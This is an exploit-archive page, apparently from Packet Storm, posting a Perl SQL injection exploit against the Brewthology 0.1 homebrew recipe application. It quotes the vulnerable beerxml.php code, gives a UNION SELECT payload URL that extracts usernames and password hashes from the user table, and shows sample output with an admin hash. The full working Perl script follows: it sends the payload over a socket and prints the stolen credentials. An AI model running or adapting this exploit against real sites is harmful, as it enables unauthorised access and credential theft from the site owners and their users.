Brewthology 0.1 SQL Injection

Brewthology 0.1 SQL Injection: Posted Feb 26, 2013; Authored by cr4wl3r; Brewthology version 0.1 remote SQL injection exploit that dumps the user table and leverages beerxml.php.; tags | exploit, remote, php, sql injection; SHA-256 | 2a468fd42e9ff8f4ed89e105b058173e97ccfb7bcac8a4635e83bb2d0588d739; Download | Favorite | View

Brewthology 0.1 SQL Injection

#Brewthology 0.1 SQL Injection Exploit
#By cr4wl3r http://bastardlabs.info
#Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/
#Demo: http://bastardlabs.info/demo/brewthology.png
#Tested: Win 7
#
# Bugs found in beerxml.php
#
# if (isset($_GET['r'])) 
#   { 
#   $recipenum = $_GET['r']; 
# 
# // Pull Data from DB  
#    $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum"; 
#    $recresult = @mysql_query ($recipes); 
#  }
#
# http://bastardlabs/[path]/beerxml.php?r=[SQLi]
# Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users
#
#
# $ perl brewthology.pl localhost /demo/
# [+] Please Wait ...
#
# [+] Getting Username and Password    [ ok ]
# [+] w00tw00t
# [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1

#!/usr/bin/perl

use IO::Socket;

$host = $ARGV[0];
$path = $ARGV[1];

if (@ARGV < 2) { 

print qq(
+---------------------------------------------+
|    Brewthology 0.1 SQL Injection Exploit    |
|                                             |
|            coded & exploited by cr4wl3r     |
|                 http://bastardlabs.info/    |
+---------------------------------------------+
                    -=[X]=-
   +---------------------------------------
    Usage :                                
                                           
    perl $0 <host> <path>                  
    ex : perl $0 127.0.0.1 /Brewthology/   
                                           
   +---------------------------------------
);
}

$target = "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", 
PeerPort=>"80") || die "[-] Can't connect to Server   [ failed ]\n";
print "[+] Please Wait ...\n";
print $sock "GET $target HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: BastardLabs\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
sleep 2;
while ($answer = <$sock>) {
if ($answer =~ /<USE>(.*?)<\/USE>/) {
print "\n[+] Getting Username and Password    [ ok ]\n";
sleep 1;
print "[+] w00tw00t\n";
print "[+] Username | Password --> $1\n";
exit();
}
}
print "[-] Exploit Failed !\n";

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 173 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

Brewthology 0.1 SQL Injection

Brewthology 0.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Brewthology 0.1 SQL Injection

Share This

Brewthology 0.1 SQL Injection

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems